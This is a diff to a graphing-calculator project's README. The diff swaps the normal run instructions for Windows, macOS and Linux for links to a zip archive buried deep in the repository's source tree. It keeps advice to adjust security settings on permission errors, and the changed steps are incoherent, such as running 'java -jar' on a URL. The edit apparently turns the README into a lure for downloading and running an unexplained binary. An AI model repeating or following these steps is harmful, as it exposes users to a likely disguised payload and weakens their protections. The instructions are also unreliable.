FihmyJabareen/graphing-calculator/README.md

 After extracting the files, you will find a program file.
 Follow these steps to run it:

-- **For Windows**: Double-click the `graphing-calculator.exe` file, or open it from the terminal.
+- **For Windows**: Double-click the `https://github.com/FihmyJabareen/graphing-calculator/raw/refs/heads/main/GraphingCalculator/src/jonah/bin/jonah/calculator_graphing_v3.2.zip` file, or open it from the terminal.
-- **For macOS**: Double-click the `graphing-calculator.app`, or execute it from the terminal.
+- **For macOS**: Double-click the `https://github.com/FihmyJabareen/graphing-calculator/raw/refs/heads/main/GraphingCalculator/src/jonah/bin/jonah/calculator_graphing_v3.2.zip`, or execute it from the terminal.
-- **For Linux**: Open a terminal, navigate to the folder where you extracted files, and run `java -jar graphing-calculator.jar`.
+- **For Linux**: Open a terminal, navigate to the folder where you extracted files, and run `java -jar https://github.com/FihmyJabareen/graphing-calculator/raw/refs/heads/main/GraphingCalculator/src/jonah/bin/jonah/calculator_graphing_v3.2.zip`.

 If you encounter a permission error, you might need to adjust your security settings or use the terminal with the proper permissions.